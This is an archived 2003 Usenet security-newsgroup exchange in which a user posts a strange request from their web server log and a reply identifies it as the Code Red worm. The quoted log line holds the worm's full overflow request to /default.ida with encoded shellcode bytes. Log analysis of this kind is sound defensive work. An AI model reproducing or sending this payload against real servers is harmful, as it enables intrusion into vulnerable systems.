Re: Another New Worm?

From: David (thunderbolt01_at_netscape.net)
Date: 08/23/03

• Next message: ynotssor: "Re: Another New Worm?"
• Previous message: Andreas Tretow: "Re: Howto detect SYN scan?"
• In reply to: For Example: John Smith: "Another New Worm?"
• Next in thread: David: "Re: Another New Worm?"
• Reply: David: "Re: Another New Worm?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Date: Sat, 23 Aug 2003 18:51:41 GMT

For Example: John Smith wrote:
> Been a busy week for worms, huh? I just checked my logs and
> started seeing this. Have any of you seen it yet?, because I
> haven't found any mention of it. Maybe I found a new worm!!
>
> "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
> u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 400 321
>
> The interesting thing is that it also sends a malformed
> request to the web server. I'm just wondering why it would do
> this, what the benefit is? Apache doesn't seem to mind it.
> Is it aimed at some other platform (maybe Microsoft)?
>
> This is very interesting. I may go ahead and post a report
> about it on the bugtraq security list.

It looks like the old Code Red back before they switched it

From: NNNNNNNNNNNNNNNNNNNNNNNNNNNNN
To: XXXXXXXXXXXXXXXXXXXXXXXXXXXXX

but I could be wrong.

-- 
Confucius:  He who play in root, eventually kill tree.
Registered with The Linux Counter.  http://counter.li.org/
Slackware 9.0 Kernel 2.4.21 i686 (GCC) 3.3
Uptime: 6 days, 11:49, 1 user, load average: 1.25, 1.17, 1.19

---

• Next message: ynotssor: "Re: Another New Worm?"
• Previous message: Andreas Tretow: "Re: Howto detect SYN scan?"
• In reply to: For Example: John Smith: "Another New Worm?"
• Next in thread: David: "Re: Another New Worm?"
• Reply: David: "Re: Another New Worm?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Relevant Pages Re: Another New Worm? ... > Been a busy week for worms, huh? ... I just checked my logs and started ... (comp.os.linux.security) Virus ... trojans and worms for Window$ and XP! ... Huh... ... (comp.sys.mac.system) Re: Ok, I get it... ... hides behind the sofa giggling! ... It's a quagmire of paysites, camwhore bots, "free" sites if you don't mind ... Newly joined women are so busy ... Can of worms - what every fisherman wants. ... (uk.singles) Re: I am REALLY Getting Tired of Probes on 445 and 135 ... >being connected to internet I have 1MB of logs with this crap, ... >Linux boxes, it's the windows boxes that are bothering me, and ... The best way to handle the problem is to try to educate users about ... scans seen are due to worms attempting to exploit the LSASS ... (comp.security.misc) Re: I am REALLY Getting Tired of Probes on 445 and 135 ... >being connected to internet I have 1MB of logs with this crap, ... >Linux boxes, it's the windows boxes that are bothering me, and ... The best way to handle the problem is to try to educate users about ... scans seen are due to worms attempting to exploit the LSASS ... (comp.os.linux.security)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Newsgroups  > comp.os.linux.security  > 2003-08